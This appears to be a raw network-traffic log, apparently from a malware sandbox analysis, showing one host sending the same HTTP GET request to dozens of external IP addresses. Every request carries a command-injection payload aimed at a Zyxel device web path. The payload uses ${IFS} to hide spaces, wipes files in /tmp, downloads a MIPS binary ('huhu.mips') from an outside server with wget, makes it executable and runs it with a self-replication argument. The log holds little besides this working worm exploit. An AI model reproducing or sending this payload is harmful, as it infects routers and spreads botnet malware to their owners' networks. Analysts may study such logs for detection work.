                                              Jan 29, 2024 07:03:40.819305897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2050192.168.2.1454846221.53.72.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819336891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2051192.168.2.1453662188.173.228.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819375038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2052192.168.2.1452038125.63.101.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819420099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2053192.168.2.1451656114.203.88.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819458961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2054192.168.2.1447942159.229.176.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819506884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2055192.168.2.1458130113.124.175.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819531918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2056192.168.2.1456464184.206.228.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819576979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2057192.168.2.144713653.173.148.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819612980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2058192.168.2.1440766116.13.63.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819655895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2059192.168.2.145502413.61.147.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819684982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2060192.168.2.1444630173.127.143.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819720030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2061192.168.2.143401671.14.216.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819746017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2062192.168.2.143622038.107.164.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819792032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2063192.168.2.144689072.211.126.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819855928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2064192.168.2.144855683.185.37.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819866896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2065192.168.2.1455952170.203.136.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819895029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2066192.168.2.1454982160.48.133.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819931984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2067192.168.2.1456134203.131.255.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819962978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2068192.168.2.1451352171.3.239.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820002079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2069192.168.2.1451772212.163.224.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820039988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2070192.168.2.1442814204.74.38.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820075989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2071192.168.2.1444890208.128.57.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820102930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2072192.168.2.144385296.5.188.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820148945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2073192.168.2.1458272143.230.183.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820188999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2074192.168.2.144411039.61.170.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820240021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2075192.168.2.144769239.5.60.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820274115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2076192.168.2.144248466.56.58.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820298910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2077192.168.2.1438172112.239.20.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820348978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2078192.168.2.1438948218.220.211.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820384979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2079192.168.2.1460788201.110.198.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820430994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2080192.168.2.14415181.138.193.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820455074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2081192.168.2.143557871.137.119.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820485115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2082192.168.2.144936495.10.158.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820512056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2083192.168.2.1433232204.179.61.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820560932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2084192.168.2.1442384172.179.95.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820595026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2085192.168.2.143979264.206.88.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820630074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2086192.168.2.143711038.148.83.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820679903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2087192.168.2.145195271.175.155.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820707083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2088192.168.2.1456692142.153.140.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820740938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2089192.168.2.1444354153.3.75.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820772886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2090192.168.2.144495631.218.99.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820795059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2091192.168.2.1437784163.5.75.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820844889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2092192.168.2.1437482155.147.232.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820873022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2093192.168.2.1449286157.114.96.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820921898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2094192.168.2.143452224.126.188.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820941925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2095192.168.2.143815666.136.168.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.820982933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2096192.168.2.143428225.129.43.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821038961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2097192.168.2.143530244.167.11.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821072102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2098192.168.2.1434390210.35.239.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821096897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2099192.168.2.145491469.204.144.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821130991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2100192.168.2.1453398180.131.206.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821163893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2101192.168.2.1449438153.161.27.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821213007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2102192.168.2.1452718194.241.93.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821245909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2103192.168.2.1449080150.246.255.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821293116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2104192.168.2.145760062.119.171.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821336031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2105192.168.2.1457572131.114.152.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821362019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2106192.168.2.1453686197.110.60.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821384907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2107192.168.2.145763846.64.66.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821433067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2108192.168.2.145397695.209.242.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821476936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2109192.168.2.1453896136.138.107.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821510077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2110192.168.2.1435232157.249.70.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821548939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2111192.168.2.144802877.144.24.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821602106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2112192.168.2.146065895.167.16.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821623087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2113192.168.2.1440376109.251.16.238443
                                              TimestampBytes transferredDirectionData
